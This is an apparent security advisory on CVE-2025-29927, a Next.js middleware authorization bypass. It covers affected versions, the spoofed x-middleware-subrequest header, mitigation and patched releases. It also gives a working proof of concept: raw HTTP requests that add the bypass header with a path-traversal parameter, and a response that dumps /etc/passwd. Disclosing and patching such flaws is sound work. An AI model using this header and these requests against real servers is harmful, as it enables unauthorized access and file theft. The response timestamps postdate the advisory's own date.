CVE-2025-29927
May 20, 2025
Overview
CVE IDCVE-2025-29927
SeverityCritical
CVSS Score9.1
StatusPatched
CVE-2025-29927 — Next.js Middleware Authorization Bypass
Summary
A critical authorization bypass vulnerability in Next.js (a popular React framework) that affects versions:
- 1.11.4 up to but not including:
- 12.3.5
- 13.5.9
- 14.2.25
- 15.2.3
Applications using middleware for authentication or authorization are particularly at risk.
Root Cause
- Vulnerability is due to trusting the
x-middleware-subrequestheader. - Attackers can spoof this header in HTTP requests.
- Next.js then skips middleware execution (auth, access control, etc.), resulting in unauthorized access.
Exploitation
Add this header to a request:
X-Middleware-Subrequest: middleware:middleware:middlewareProof of Concept
Request 1 (Without Bypass):
GET /api/getfiles?fileNAME=../../../../etc/passwd HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Length: 0Response 1 (Redirected to Auth):
HTTP/1.1 307 Temporary Redirect
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 02 Sep 2025 11:13:59 GMT
Connection: keep-alive
Location: /api/auth/signin?callbackUrl=%2Fapi%2Fdownload%3FfileNAME%3D..%252F..%252F..%252F..%252Fetc%252Fpasswd
Content-Length: 101Request 2 (With Bypass):
GET /api/getfile?fileNAME=../../../../etc/passwd HTTP/1.1
Host: 192.168.0.1
X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Length: 0Response 2 (Successful Bypass):
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 02 Sep 2025 11:15:54 GMT
Content-Type: application/zip
Content-Length: 787
Connection: keep-alive
Content-Disposition: attachment; filename=../../../../etc/passwd
ETag: "41amqg1v4m26j"
root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
node:x:1000:1000::/home/node:/bin/sh
nextjs:x:1001:65533::/home/nextjs:/sbin/nologin
roger:x:0:0:root:/home/roger:/bin/shAffected Systems
- Next.js versions 1.11.4 up to but not including:
- 12.3.5
- 13.5.9
- 14.2.25
- 15.2.3
- Applications using Next.js middleware for authentication or authorization
- Web applications built with the Next.js framework
Impact Assessment
- Critical severity with CVSS score of 9.1
- Complete authorization bypass for protected routes
- Unauthorized access to sensitive endpoints
- Potential data exfiltration and system compromise
- Bypass of security controls implemented in middleware
Mitigation Strategies
- Immediate Action: Update to the latest patched versions
- Version Updates:
- Update to 12.3.5 or later (for v12)
- Update to 13.5.9 or later (for v13)
- Update to 14.2.25 or later (for v14)
- Update to 15.2.3 or later (for v15)
- Security Review: Audit middleware implementations
- Monitoring: Implement additional security controls
Timeline
- Discovery: Early 2025
- Disclosure: May 2025
- Patches Released: May 2025
- Status: Patched in latest versions